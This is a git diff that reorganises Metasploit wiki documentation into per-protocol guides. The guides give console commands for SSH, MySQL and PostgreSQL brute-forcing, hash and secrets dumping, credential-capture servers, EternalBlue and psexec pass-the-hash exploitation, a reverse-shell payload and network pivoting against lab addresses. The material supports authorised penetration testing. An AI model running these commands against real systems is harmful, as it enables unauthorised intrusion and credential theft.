diff --git a/Metasploit-Guide-HTTP.md b/Metasploit-Guide-HTTP.md
new file mode 100644
index 0000000000..cd6b69389f
--- /dev/null
+++ b/Metasploit-Guide-HTTP.md
@@ -0,0 +1,101 @@
+## HTTP Support
+
+### HTTP Examples
+
+Auxiliary modules:
+
+```
+use auxiliary/scanner/http/title
+run http://example.com https://example.com https://foo.example.com/bar
+```
+
+Specifying credentials and payload information:
+
+```
+use exploit/unix/http/cacti_filter_sqli_rce
+run http://admin:pass@application.local/cacti/ lhost=tun0 lport=4444
+run 'http://admin:pass with spaces@application.local/cacti/' lhost=tun0 lport=4444
+```
+
+Specifying alternative ports:
+
+```
+run http://192.168.123.6:9001
+```
+
+### HTTP Debugging
+
+You can log all HTTP requests and responses to the Metasploit console with the `HttpTrace` option, as well as enable additional verbose logging:
+
+```
+use auxiliary/scanner/http/title
+run http://example.com HttpTrace=true verbose=true
+```
+
+To send all HTTP requests through a proxy, i.e. through Burp Suite:
+
+```
+use auxiliary/scanner/http/title
+run http://example.com HttpTrace=true verbose=true proxies=HTTP:127.0.0.1:8080
+```
+
+### HTTP Credentials
+
+If the module has no `username`/`password` options, for instance to log into an admin portal of a web application etc, then the credentials supplied via a HTTP URI will set the `HttpUsername`/`HttpPassword` options for [HTTP Basic access Authentication](https://en.wikipedia.org/wiki/Basic_access_authentication) purposes.
+
+For instance, in the following module the `username`/`password` options will be set whilst the `HttpUsername`/`HttpPassword` options will not:
+
+```
+use exploit/unix/http/cacti_filter_sqli_rce
+
+Module options (exploit/unix/http/cacti_filter_sqli_rce):
+
+ Name Current Setting Required Description
+ ---- --------------- -------- -----------
+ ... Omitted ...
+* PASSWORD admin no Password to login with
+ TARGETURI /cacti/ yes The URI of Cacti
+* USERNAME user yes User to login with
+ ... Omitted ...
+
+check http://admin:user@application.local/cacti/
+
+USERNAME and PASSWORD will be set to 'admin' and 'user'
+```
+
+For the following module, as there are no `USERNAME`/`PASSWORD` options, the `HttpUsername`/`HttpPassword` options will be chosen instead for [HTTP Basic access Authentication](https://en.wikipedia.org/wiki/Basic_access_authentication) purposes
+
+```
+use exploit/multi/http/tomcat_mgr_deploy
+run http://admin:admin@192.168.123.6:8888 HttpTrace=true verbose=true lhost=192.168.123.1
+```
+
+Note that the `HttpUsername`/`HttpPassword` may not be present in the `options` output, but can be found in the `advanced` module options:
+
+```
+use auxiliary/scanner/http/title
+advanced
+
+Module advanced options (auxiliary/scanner/http/title):
+
+ Name Current Setting Required Description
+ ---- --------------- -------- -----------
+ DOMAIN WORKSTATION yes The domain to use for Windows authentication
+ DigestAuthIIS true no Conform to IIS, should work for most servers. Only set to false for non-IIS servers
+ FingerprintCheck true no Conduct a pre-exploit fingerprint verification
+ HttpClientTimeout no HTTP connection and receive timeout
+* HttpPassword no The HTTP password to specify for authentication
+ HttpRawHeaders no Path to ERB-templatized raw headers to append to existing headers
+ HttpTrace false no Show the raw HTTP requests and responses
+ HttpTraceColors red/blu no HTTP request and response colors for HttpTrace (unset to disable)
+ HttpTraceHeadersOnly false no Show HTTP headers only in HttpTrace
+* HttpUsername no The HTTP username to specify for authentication
+ SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accept
+ ed: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
+ ShowProgress true yes Display progress messages during a scan
+ ShowProgressPercent 10 yes The interval in percent that progress should be shown
+ UserAgent Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 no The User-Agent header to use for all requests
+ )
+ VERBOSE false no Enable detailed status messages
+ WORKSPACE no Specify the workspace for this module
+```
\ No newline at end of file
diff --git a/Metasploit-Guide-MySQL.md b/Metasploit-Guide-MySQL.md
new file mode 100644
index 0000000000..b1631140af
--- /dev/null
+++ b/Metasploit-Guide-MySQL.md
@@ -0,0 +1,86 @@
+## MySQL
+
+For instance, when running a MySQL target:
+
+```
+docker run -it --rm -e MYSQL_ROOT_PASSWORD=' a b c p4$$w0rd' -p 3306:3306 mariadb:latest
+```
+
+### MySQL Enumeration
+
+Enumerate version:
+
+```
+use auxiliary/scanner/mysql/mysql_version
+run mysql://127.0.0.1
+```
+
+### MySQL Login / Bruteforce
+
+If you have MySQL credentials to validate:
+
+```
+use auxiliary/scanner/mysql/mysql_login
+run 'mysql://root: a b c p4$$w0rd@127.0.0.1'
+```
+
+Re-using MySQL credentials in a subnet:
+
+```
+use auxiliary/scanner/mysql/mysql_login
+run cidr:/24:mysql://user:pass@192.168.222.0 threads=50
+```
+
+Using an alternative port:
+
+```
+use auxiliary/scanner/mysql/mysql_login
+run mysql://user:pass@192.168.123.6:2222
+```
+
+Brute-force host with known user and password list:
+
+```
+use auxiliary/scanner/mysql/mysql_login
+run mysql://known_user@192.168.222.1 threads=50 pass_file=./rockyou.txt
+```
+
+Brute-force credentials:
+
+```
+use auxiliary/scanner/mysql/mysql_login
+run mysql://192.168.222.1 threads=50 user_file=./users.txt pass_file=./rockyou.txt
+```
+
+Brute-force credentials in a subnet:
+
+```
+use auxiliary/scanner/mysql/mysql_login
+run cidr:/24:mysql://user:pass@192.168.222.0 threads=50
+run cidr:/24:mysql://user@192.168.222.0 threads=50 pass_file=./rockyou.txt
+```
+
+### MySQL Dumping
+
+User and hash dump:
+
+```
+use auxiliary/scanner/mysql/mysql_hashdump
+run 'mysql://root: a b c p4$$w0rd@127.0.0.1'
+```
+
+Schema dump:
+
+```
+use auxiliary/scanner/mysql/mysql_schemadump
+run 'mysql://root: a b c p4$$w0rd@127.0.0.1'
+```
+
+### MySQL Querying
+
+Execute raw SQL:
+
+```
+use admin/mysql/mysql_sql
+run 'mysql://root: a b c p4$$w0rd@127.0.0.1' sql='select version()'
+```
diff --git a/Metasploit-Guide-PostgreSQL.md b/Metasploit-Guide-PostgreSQL.md
new file mode 100644
index 0000000000..434717fd2a
--- /dev/null
+++ b/Metasploit-Guide-PostgreSQL.md
@@ -0,0 +1,118 @@
+## PostgreSQL
+
+For instance, when running a PostgreSQL instance:
+
+```
+docker run --rm -p 5432:5432 -e POSTGRES_PASSWORD=password postgres:13.1-alpine
+```
+
+### PostgreSQL Enumeration
+
+Enumerate version:
+
+```
+use auxiliary/scanner/postgres/postgres_version
+run postgres://192.168.123.13
+run postgres://postgres:password@192.168.123.13
+```
+
+### PostgreSQL Login / Bruteforce
+
+If you have PostgreSQL credentials to validate:
+
+```
+use auxiliary/scanner/postgres/postgres_login
+run 'postgres://root: a b c p4$$w0rd@127.0.0.1'
+```
+
+Re-using PostgreSQL credentials in a subnet:
+
+```
+use auxiliary/scanner/postgres/postgres_login
+run cidr:/24:myspostgresl://user:pass@192.168.222.0 threads=50
+```
+
+Using an alternative port:
+
+```
+use auxiliary/scanner/postgres/postgres_login
+run postgres://user:pass@192.168.123.6:2222
+```
+
+Brute-force host with known user and password list:
+
+```
+use auxiliary/scanner/postgres/postgres_login
+run postgres://known_user@192.168.222.1 threads=50 pass_file=./rockyou.txt
+```
+
+Brute-force credentials:
+
+```
+use auxiliary/scanner/postgres/postgres_login
+run postgres://192.168.222.1 threads=50 user_file=./users.txt pass_file=./rockyou.txt
+```
+
+Brute-force credentials in a subnet:
+
+```
+use auxiliary/scanner/postgres/postgres_login
+run cidr:/24:postgres://user:pass@192.168.222.0 threads=50
+run cidr:/24:postgres://user@192.168.222.0 threads=50 pass_file=./rockyou.txt
+```
+
+### PostgreSQL Capture Server
+
+Captures and log PostgreSQL credentials:
+
+```
+use auxiliary/server/capture/postgresql
+run
+```
+
+For example, if a client connects with:
+
+```
+psql postgres://postgres:mysecretpassword@localhost:5432
+```
+
+Metasploit's output will be:
+
+```
+msf6 auxiliary(server/capture/postgresql) >
+[*] Started service listener on 0.0.0.0:5432
+[*] Server started.
+[+] PostgreSQL LOGIN 127.0.0.1:60406 postgres / mysecretpassword / postgres
+```
+
+### PostgreSQL Dumping
+
+User and hash dump:
+
+```
+use auxiliary/scanner/postgres/postgres_hashdump
+run postgres://postgres:password@192.168.123.13
+run postgres://postgres:password@192.168.123.13/database_name
+```
+
+Schema dump:
+
+```
+use auxiliary/scanner/postgres/postgres_schemadump
+run postgres://postgres:password@192.168.123.13
+run postgres://postgres:password@192.168.123.13 ignored_databases=template1,template0,postgres
+```
+
+### PostgreSQL Querying
+
+```
+use auxiliary/admin/postgres/postgres_sql
+run 'postgres://user:this is my password@192.168.1.123/database_name' sql='select version()'
+```
+
+### PostgreSQL Reverse Shell
+
+```
+use exploit/linux/postgres/postgres_payload
+run postgres://postgres:password@192.168.123.6 lhost=192.168.123.1 lport=5000 payload=linux/x64/meterpreter/reverse_tcp target='Linux\ x86_64'
+```
\ No newline at end of file
diff --git a/Metasploit-Guide-SMB.md b/Metasploit-Guide-SMB.md
new file mode 100644
index 0000000000..98a65e491e
--- /dev/null
+++ b/Metasploit-Guide-SMB.md
@@ -0,0 +1,122 @@
+## SMB Support
+
+### SMB Enumeration
+
+Enumerate SMB version:
+
+```
+use auxiliary/scanner/smb/smb_version
+run smb://10.10.10.161
+```
+
+Enumerate shares:
+
+```
+use auxiliary/scanner/smb/smb_enumshares
+run smb://10.10.10.161
+run smb://user:pass@10.10.10.161
+run 'smb://domain;user with spaces:pass@192.168.123.4' SMB::AlwaysEncrypt=false SMB::ProtocolVersion=1
+```
+
+Enumerate shares and show all files recursively:
+
+```
+use auxiliary/scanner/smb/smb_enumshares
+run 'smb://user:pass with a space@10.10.10.161' showfiles=true spidershares=true
+```
+
+Enumerate users:
+
+```
+use auxiliary/scanner/smb/smb_enumusers
+run smb://user:p4$$w0rd@192.168.123.13
+```
+
+[Enumerate gpp files](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/scanner/smb/smb_enum_gpp.md) in a SMB share:
+
+```
+use auxiliary/scanner/smb/smb_enum_gpp
+run smb://192.168.123.13/share_name verbose=true store=true
+run smb://user:p4$$w0rd@192.168.123.13/share_name verbose=true store=true
+```
+
+### SMB Server
+
+Create a mock SMB server which accepts credentials before returning `NT_STATUS_LOGON_FAILURE`. These hashes can then be cracked later:
+
+```
+use auxiliary/server/capture/smb
+run
+```
+
+### SMB ms17_010
+
+Checking for exploitability:
+
+```
+use auxiliary/scanner/smb/smb_ms17_010
+check 10.10.10.23
+check 10.10.10.0/24
+check smb://user:pass@10.10.10.1/
+check smb://domain;user:pass@10.10.10.1/
+check cidr:/24:smb://user:pass@10.10.10.0 threads=32
+```
+
+As of 2021, Metasploit supports a single exploit module for which has the capability to target Windows 7, Windows 8.1, Windows 2012 R2, and Windows 10, full details within the [Metasploit Wrapup](https://www.rapid7.com/blog/post/2021/07/16/metasploit-wrap-up-121/):
+
+```
+use exploit/windows/smb/ms17_010_eternalblue
+run 10.10.10.23 lhost=192.168.123.1
+run 10.10.10.0/24 lhost=192.168.123.1 lport=5000
+run smb://user:pass@10.10.10.1/ lhost=192.168.123.1
+run smb://domain;user:pass@10.10.10.1/ lhost=192.168.123.1
+```
+
+### SMB psexec
+
+Running psexec against a remote host with credentials:
+
+```
+use exploit/windows/smb/psexec
+run smb://user:pass8@192.168.123.13 lhost=192.168.123.1 lport=5000
+```
+
+Running psexec with NTLM hashes:
+
+```
+use exploit/windows/smb/psexec
+run smb://Administrator:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6@10.10.10.161 lhost=10.10.14.13 lport=5000
+```
+
+### SMB Dumping
+
+Dumping secrets with credentials:
+
+```
+use auxiliary/gather/windows_secrets_dump
+run smb://user:pass@192.168.123.6
+```
+
+Dumping secrets with NTLM hashes
+
+```
+use auxiliary/gather/windows_secrets_dump
+run smb://Administrator:aad3b435b51404eeaad3b435b51404ee:15feae27e637cb98ffacdf0a840eeb4b@192.168.123.1
+```
+
+### SMB Files
+
+Download a file:
+
+```
+use auxiliary/admin/smb/download_file
+run smb://a:p4$$w0rd@192.168.123.13/my_share/helloworld.txt
+```
+
+Upload a file:
+
+```
+use auxiliary/admin/smb/upload_file
+echo "my file" > local_file.txt
+run smb://a:p4$$w0rd@192.168.123.13/my_share/remote_file.txt lpath=./local_file.txt
+```
diff --git a/Metasploit-Guide-SSH.md b/Metasploit-Guide-SSH.md
new file mode 100644
index 0000000000..8b91a03cd1
--- /dev/null
+++ b/Metasploit-Guide-SSH.md
@@ -0,0 +1,71 @@
+## SSH Workflows
+
+### SSH Enumeration
+
+Enumerate SSH version:
+
+```
+use auxiliary/scanner/ssh/ssh_version
+run ssh://127.0.0.1
+```
+
+### SSH Bruteforce
+
+Brute-force host with known user and password list:
+
+```
+use scanner/ssh/ssh_login
+run ssh://known_user@192.168.222.1 threads=50 pass_file=./rockyou.txt
+```
+
+Brute-force credentials:
+
+```
+use scanner/ssh/ssh_login
+run ssh://192.168.222.1 threads=50 user_file=./users.txt pass_file=./rockyou.txt
+```
+
+Brute-force credentials in a subnet:
+
+```
+use scanner/ssh/ssh_login
+run cidr:/24:ssh://user:pass@192.168.222.0 threads=50
+run cidr:/24:ssh://user@192.168.222.0 threads=50 pass_file=./rockyou.txt
+```
+
+### SSH Login
+
+If you have valid SSH credentials the `ssh_login` module will open a Metasploit session for you:
+
+```
+use scanner/ssh/ssh_login
+run ssh://user:pass@172.18.102.20
+```
+
+Re-using SSH credentials in a subnet:
+
+```
+use scanner/ssh/ssh_login
+run cidr:/24:ssh://user:pass@192.168.222.0 threads=50
+```
+
+Using an alternative port:
+
+```
+use scanner/ssh/ssh_login
+run ssh://user:pass@192.168.123.6:2222
+```
+
+### SSH Pivoting
+
+Like Meterpreter, it is possible to [port forward through a Metasploit SSH session](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/scanner/ssh/ssh_login.md#session-capabilities):
+
+```
+route add 172.18.103.0/24 ssh_session_id
+```
+
+To a route for the most recently opened Meterpreter session:
+
+```
+route add 172.18.103.0/24 -1
+```
\ No newline at end of file
diff --git a/Metasploit-Guide-Setting-Options.md b/Metasploit-Guide-Setting-Options.md
new file mode 100644
index 0000000000..2ee1ffbf53
--- /dev/null
+++ b/Metasploit-Guide-Setting-Options.md
@@ -0,0 +1,65 @@
+## Examples
+
+Traditional usage of Metasploit involves loading a module, and setting multiple options individually:
+
+```
+use exploit/linux/postgres/postgres_payload
+set username administrator
+set password pass
+set rhost 192.168.123.6
+set rport 5432
+set database postgres
+set lhost 192.168.123.1
+set lport 5000
+run
+```
+
+Traditionally, you can also specify multiple RHOSTS separated by spaces or with a CIDR subnet mask:
+
+```
+set rhosts 127.0.0.1 127.0.0.2
+set rhosts 127.0.0.1/24
+```
+
+This document describes a modern approach to setting multiple options in a command. This workflow will not only make it easier to use `reverse-i-search` with `CTRL+R` in Metasploit's console, but it will also make it easier to share cheat sheets amongst pentesters.
+
+### URI support for RHOSTS
+
+Metasploit now supports the use of [URI](https://en.wikipedia.org/wiki/Uniform_Resource_Identifier) strings as arguments to the run command to specify RHOST values and option values at once:
+
+```
+use exploit/linux/postgres/postgres_payload
+run postgres://administrator:pass@192.168.123.6 lhost=192.168.123.1 lport=5000
+```
+
+The following protocols are currently supported, and described in more detail below:
+
+- cidr - Can be combined with other protocols to specify address subnet mask length
+- file - Load a series of RHOST values separated by newlines from a file. This file can also include URI strings
+- http
+- https
+- mysql
+- postgres
+- smb
+- ssh
+
+To preserve whitespace, regardless of the protocol, use quotes:
+
+```
+use auxiliary/admin/postgres/postgres_sql
+run 'postgres://user:this is my password@192.168.1.123/database_name' sql='select version()'
+```
+
+In some scenarios it may be too troublesome to escape quotes within a password. In this scenario it possible to still set the password option manually and use the URI argument without a password specified, the module will gracefully fallback to using the manually set password:
+
+```
+set password !@£$%^&*()"'
+run smb://user@192.168.123.13
+```
+
+You can also specify multiple RHOST arguments, as well as provide additionally inlined options:
+
+```
+use scanner/smb/smb_enumshares
+run smb://test:test@192.168.1.223 smb://user:password@192.168.1.223 smb://test:test@127.0.0.1 verbose=true
+```
diff --git a/Metasploit-Guide-Upgrading-to-Meterpreter.md b/Metasploit-Guide-Upgrading-to-Meterpreter.md
new file mode 100644
index 0000000000..688e075fe3
--- /dev/null
+++ b/Metasploit-Guide-Upgrading-to-Meterpreter.md
@@ -0,0 +1,32 @@
+## Upgrading shells to Meterpreter
+
+To upgrade a specific session to Meterpreter:
+
+```
+sessions -u 3
+```
+
+To upgrade the most recently opened session to Meterpreter using the `sessions` command:
+
+```
+sessions -u -1
+```
+
+Or run the `shell_to_meterpreter` module manually:
+
+```
+use multi/manage/shell_to_meterpreter
+run session=-1
+run session=-1 win_transfer=POWERSHELL
+run session=-1 win_transfer=VBS
+```
+
+## Post Modules
+
+Providing inline options also works for post modules:
+
+```
+use auxiliary/windows/gather/credentials/gpp
+run session=-1
+```
+
diff --git a/Using-Metasploit.md b/Using-Metasploit.md
index f12b910a52..5121fc3942 100644
--- a/Using-Metasploit.md
+++ b/Using-Metasploit.md
@@ -1,38 +1,3 @@
-- [Using Metasploit](#getting-started)
- * [Getting started](#overview)
- * [Overview](#overview)
- + [URI support for RHOSTS](#uri-support-for-rhosts)
- * [HTTP Support](#http-support)
- + [HTTP Examples](#http-examples)
- + [HTTP Debugging](#http-debugging)
- + [HTTP Credentials](#http-credentials)
- * [SMB Support](#smb-support)
- + [SMB Enumeration](#smb-enumeration)
- + [SMB Server](#smb-servef)
- + [SMB ms17_010](#smb-ms17-010)
- + [SMB psexec](#smb-psexec)
- + [SMB Dumping](#smb-dumping)
- + [SMB Files](#smb-files)
- * [SSH Workflows](#ssh-workflows)
- + [SSH Enumeration](#ssh-enumeration)
- + [SSH Bruteforce](#ssh-bruteforce)
- + [SSH Login](#ssh-login)
- + [SSH Pivoting](#ssh-pivoting)
- * [MySQL](#mysql)
- + [MySQL Enumeration](#mysql-enumeration)
- + [MySQL Login / Bruteforce](#mysql-login---bruteforce)
- + [MySQL Dumping](#mysql-dumping)
- + [MySQL Querying](#mysql-querying)
- * [PostgreSQL](#postgresql)
- + [PostgreSQL Enumeration](#postgresql-enumeration)
- + [PostgreSQL Login / Bruteforce](#postgresql-login---bruteforce)
- + [PostgreSQL Capture Server](#postgresql-capture-server)
- + [PostgreSQL Dumping](#postgresql-dumping)
- + [PostgreSQL Querying](#postgresql-querying)
- + [PostgreSQL Reverse Shell](#postgresql-reverse-shell)
- * [Upgrading shells to Meterpreter](#upgrading-shells-to-meterpreter)
- * [Post Modules](#post-modules)
-
## Getting started
Depending on your skill level - if you have no experience with Metasploit, the following resources may be a better starting point:
@@ -42,605 +7,3 @@ Depending on your skill level - if you have no experience with Metasploit, the f
*
*
*
-
-## Overview
-
-Traditional usage of Metasploit involves loading a module, and setting multiple options:
-
-```
-use exploit/linux/postgres/postgres_payload
-set username administrator
-set password pass
-set rhost 192.168.123.6
-set rport 5432
-set database postgres
-set lhost 192.168.123.1
-set lport 5000
-run
-```
-
-Traditionally, you can also specify multiple RHOSTS separated by spaces or with a CIDR subnet mask:
-
-```
-set rhosts 127.0.0.1 127.0.0.2
-set rhosts 127.0.0.1/24
-```
-
-This document describes a modern approach to setting multiple options in a command. This workflow will not only make it easier to use `reverse-i-search` with `CTRL+R` in Metasploit's console, but it will also make it easier to share cheat sheets amongst pentesters.
-
-### URI support for RHOSTS
-
-Metasploit now supports the use of [URI](https://en.wikipedia.org/wiki/Uniform_Resource_Identifier) strings as arguments to the run command to specify RHOST values and option values at once:
-
-```
-use exploit/linux/postgres/postgres_payload
-run postgres://administrator:pass@192.168.123.6 lhost=192.168.123.1 lport=5000
-```
-
-The following protocols are currently supported, and described in more detail below:
-
-- cidr - Can be combined with other protocols to specify address subnet mask length
-- file - Load a series of RHOST values separated by newlines from a file. This file can also include URI strings
-- http
-- https
-- mysql
-- postgres
-- smb
-- ssh
-
-To preserve whitespace, regardless of the protocol, use quotes:
-
-```
-use auxiliary/admin/postgres/postgres_sql
-run 'postgres://user:this is my password@192.168.1.123/database_name' sql='select version()'
-```
-
-In some scenarios it may be too troublesome to escape quotes within a password. In this scenario it possible to still set the password option manually and use the URI argument without a password specified, the module will gracefully fallback to using the manually set password:
-
-```
-set password !@£$%^&*()"'
-run smb://user@192.168.123.13
-```
-
-You can also specify multiple RHOST arguments, as well as provide additionally inlined options:
-
-```
-use scanner/smb/smb_enumshares
-run smb://test:test@192.168.1.223 smb://user:password@192.168.1.223 smb://test:test@127.0.0.1 verbose=true
-```
-
-## HTTP Support
-
-### HTTP Examples
-
-Auxiliary modules:
-
-```
-use auxiliary/scanner/http/title
-run http://example.com https://example.com https://foo.example.com/bar
-```
-
-Specifying credentials and payload information:
-
-```
-use exploit/unix/http/cacti_filter_sqli_rce
-run http://admin:pass@application.local/cacti/ lhost=tun0 lport=4444
-run 'http://admin:pass with spaces@application.local/cacti/' lhost=tun0 lport=4444
-```
-
-Specifying alternative ports:
-
-```
-run http://192.168.123.6:9001
-```
-
-### HTTP Debugging
-
-You can log all HTTP requests and responses to the Metasploit console with the `HttpTrace` option, as well as enable additional verbose logging:
-
-```
-use auxiliary/scanner/http/title
-run http://example.com HttpTrace=true verbose=true
-```
-
-To send all HTTP requests through a proxy, i.e. through Burp Suite:
-
-```
-use auxiliary/scanner/http/title
-run http://example.com HttpTrace=true verbose=true proxies=HTTP:127.0.0.1:8080
-```
-
-### HTTP Credentials
-
-If the module has no `username`/`password` options, for instance to log into an admin portal of a web application etc, then the credentials supplied via a HTTP URI will set the `HttpUsername`/`HttpPassword` options for [HTTP Basic access Authentication](https://en.wikipedia.org/wiki/Basic_access_authentication) purposes.
-
-For instance, in the following module the `username`/`password` options will be set whilst the `HttpUsername`/`HttpPassword` options will not:
-
-```
-use exploit/unix/http/cacti_filter_sqli_rce
-
-Module options (exploit/unix/http/cacti_filter_sqli_rce):
-
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- ... Omitted ...
-* PASSWORD admin no Password to login with
- TARGETURI /cacti/ yes The URI of Cacti
-* USERNAME user yes User to login with
- ... Omitted ...
-
-check http://admin:user@application.local/cacti/
-
-USERNAME and PASSWORD will be set to 'admin' and 'user'
-```
-
-For the following module, as there are no `USERNAME`/`PASSWORD` options, the `HttpUsername`/`HttpPassword` options will be chosen instead for [HTTP Basic access Authentication](https://en.wikipedia.org/wiki/Basic_access_authentication) purposes
-
-```
-use exploit/multi/http/tomcat_mgr_deploy
-run http://admin:admin@192.168.123.6:8888 HttpTrace=true verbose=true lhost=192.168.123.1
-```
-
-Note that the `HttpUsername`/`HttpPassword` may not be present in the `options` output, but can be found in the `advanced` module options:
-
-```
-use auxiliary/scanner/http/title
-advanced
-
-Module advanced options (auxiliary/scanner/http/title):
-
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- DOMAIN WORKSTATION yes The domain to use for Windows authentication
- DigestAuthIIS true no Conform to IIS, should work for most servers. Only set to false for non-IIS servers
- FingerprintCheck true no Conduct a pre-exploit fingerprint verification
- HttpClientTimeout no HTTP connection and receive timeout
-* HttpPassword no The HTTP password to specify for authentication
- HttpRawHeaders no Path to ERB-templatized raw headers to append to existing headers
- HttpTrace false no Show the raw HTTP requests and responses
- HttpTraceColors red/blu no HTTP request and response colors for HttpTrace (unset to disable)
- HttpTraceHeadersOnly false no Show HTTP headers only in HttpTrace
-* HttpUsername no The HTTP username to specify for authentication
- SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accept
- ed: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
- ShowProgress true yes Display progress messages during a scan
- ShowProgressPercent 10 yes The interval in percent that progress should be shown
- UserAgent Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 no The User-Agent header to use for all requests
- )
- VERBOSE false no Enable detailed status messages
- WORKSPACE no Specify the workspace for this module
-```
-
-## SMB Support
-
-### SMB Enumeration
-
-Enumerate SMB version:
-
-```
-use auxiliary/scanner/smb/smb_version
-run smb://10.10.10.161
-```
-
-Enumerate shares:
-
-```
-use auxiliary/scanner/smb/smb_enumshares
-run smb://10.10.10.161
-run smb://user:pass@10.10.10.161
-run 'smb://domain;user with spaces:pass@192.168.123.4' SMB::AlwaysEncrypt=false SMB::ProtocolVersion=1
-```
-
-Enumerate shares and show all files recursively:
-
-```
-use auxiliary/scanner/smb/smb_enumshares
-run 'smb://user:pass with a space@10.10.10.161' showfiles=true spidershares=true
-```
-
-Enumerate users:
-
-```
-use auxiliary/scanner/smb/smb_enumusers
-run smb://user:p4$$w0rd@192.168.123.13
-```
-
-[Enumerate gpp files](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/scanner/smb/smb_enum_gpp.md) in a SMB share:
-
-```
-use auxiliary/scanner/smb/smb_enum_gpp
-run smb://192.168.123.13/share_name verbose=true store=true
-run smb://user:p4$$w0rd@192.168.123.13/share_name verbose=true store=true
-```
-
-### SMB Server
-
-Create a mock SMB server which accepts credentials before returning `NT_STATUS_LOGON_FAILURE`. These hashes can then be cracked later:
-
-```
-use auxiliary/server/capture/smb
-run
-```
-
-### SMB ms17_010
-
-Checking for exploitability:
-
-```
-use auxiliary/scanner/smb/smb_ms17_010
-check 10.10.10.23
-check 10.10.10.0/24
-check smb://user:pass@10.10.10.1/
-check smb://domain;user:pass@10.10.10.1/
-check cidr:/24:smb://user:pass@10.10.10.0 threads=32
-```
-
-As of 2021, Metasploit supports a single exploit module for which has the capability to target Windows 7, Windows 8.1, Windows 2012 R2, and Windows 10, full details within the [Metasploit Wrapup](https://www.rapid7.com/blog/post/2021/07/16/metasploit-wrap-up-121/):
-
-```
-use exploit/windows/smb/ms17_010_eternalblue
-run 10.10.10.23 lhost=192.168.123.1
-run 10.10.10.0/24 lhost=192.168.123.1 lport=5000
-run smb://user:pass@10.10.10.1/ lhost=192.168.123.1
-run smb://domain;user:pass@10.10.10.1/ lhost=192.168.123.1
-```
-
-### SMB psexec
-
-Running psexec against a remote host with credentials:
-
-```
-use exploit/windows/smb/psexec
-run smb://user:pass8@192.168.123.13 lhost=192.168.123.1 lport=5000
-```
-
-Running psexec with NTLM hashes:
-
-```
-use exploit/windows/smb/psexec
-run smb://Administrator:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6@10.10.10.161 lhost=10.10.14.13 lport=5000
-```
-
-### SMB Dumping
-
-Dumping secrets with credentials:
-
-```
-use auxiliary/gather/windows_secrets_dump
-run smb://user:pass@192.168.123.6
-```
-
-Dumping secrets with NTLM hashes
-
-```
-use auxiliary/gather/windows_secrets_dump
-run smb://Administrator:aad3b435b51404eeaad3b435b51404ee:15feae27e637cb98ffacdf0a840eeb4b@192.168.123.1
-```
-
-### SMB Files
-
-Download a file:
-
-```
-use auxiliary/admin/smb/download_file
-run smb://a:p4$$w0rd@192.168.123.13/my_share/helloworld.txt
-```
-
-Upload a file:
-
-```
-use auxiliary/admin/smb/upload_file
-echo "my file" > local_file.txt
-run smb://a:p4$$w0rd@192.168.123.13/my_share/remote_file.txt lpath=./local_file.txt
-```
-
-## SSH Workflows
-
-### SSH Enumeration
-
-Enumerate SSH version:
-
-```
-use auxiliary/scanner/ssh/ssh_version
-run ssh://127.0.0.1
-```
-
-### SSH Bruteforce
-
-Brute-force host with known user and password list:
-
-```
-use scanner/ssh/ssh_login
-run ssh://known_user@192.168.222.1 threads=50 pass_file=./rockyou.txt
-```
-
-Brute-force credentials:
-
-```
-use scanner/ssh/ssh_login
-run ssh://192.168.222.1 threads=50 user_file=./users.txt pass_file=./rockyou.txt
-```
-
-Brute-force credentials in a subnet:
-
-```
-use scanner/ssh/ssh_login
-run cidr:/24:ssh://user:pass@192.168.222.0 threads=50
-run cidr:/24:ssh://user@192.168.222.0 threads=50 pass_file=./rockyou.txt
-```
-
-### SSH Login
-
-If you have valid SSH credentials the `ssh_login` module will open a Metasploit session for you:
-
-```
-use scanner/ssh/ssh_login
-run ssh://user:pass@172.18.102.20
-```
-
-Re-using SSH credentials in a subnet:
-
-```
-use scanner/ssh/ssh_login
-run cidr:/24:ssh://user:pass@192.168.222.0 threads=50
-```
-
-Using an alternative port:
-
-```
-use scanner/ssh/ssh_login
-run ssh://user:pass@192.168.123.6:2222
-```
-
-### SSH Pivoting
-
-Like Meterpreter, it is possible to [port forward through a Metasploit SSH session](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/scanner/ssh/ssh_login.md#session-capabilities):
-
-```
-route add 172.18.103.0/24 ssh_session_id
-```
-
-To a route for the most recently opened Meterpreter session:
-
-```
-route add 172.18.103.0/24 -1
-```
-
-## MySQL
-
-For instance, when running a MySQL target:
-
-```
-docker run -it --rm -e MYSQL_ROOT_PASSWORD=' a b c p4$$w0rd' -p 3306:3306 mariadb:latest
-```
-
-### MySQL Enumeration
-
-Enumerate version:
-
-```
-use auxiliary/scanner/mysql/mysql_version
-run mysql://127.0.0.1
-```
-
-### MySQL Login / Bruteforce
-
-If you have MySQL credentials to validate:
-
-```
-use auxiliary/scanner/mysql/mysql_login
-run 'mysql://root: a b c p4$$w0rd@127.0.0.1'
-```
-
-Re-using MySQL credentials in a subnet:
-
-```
-use auxiliary/scanner/mysql/mysql_login
-run cidr:/24:mysql://user:pass@192.168.222.0 threads=50
-```
-
-Using an alternative port:
-
-```
-use auxiliary/scanner/mysql/mysql_login
-run mysql://user:pass@192.168.123.6:2222
-```
-
-Brute-force host with known user and password list:
-
-```
-use auxiliary/scanner/mysql/mysql_login
-run mysql://known_user@192.168.222.1 threads=50 pass_file=./rockyou.txt
-```
-
-Brute-force credentials:
-
-```
-use auxiliary/scanner/mysql/mysql_login
-run mysql://192.168.222.1 threads=50 user_file=./users.txt pass_file=./rockyou.txt
-```
-
-Brute-force credentials in a subnet:
-
-```
-use auxiliary/scanner/mysql/mysql_login
-run cidr:/24:mysql://user:pass@192.168.222.0 threads=50
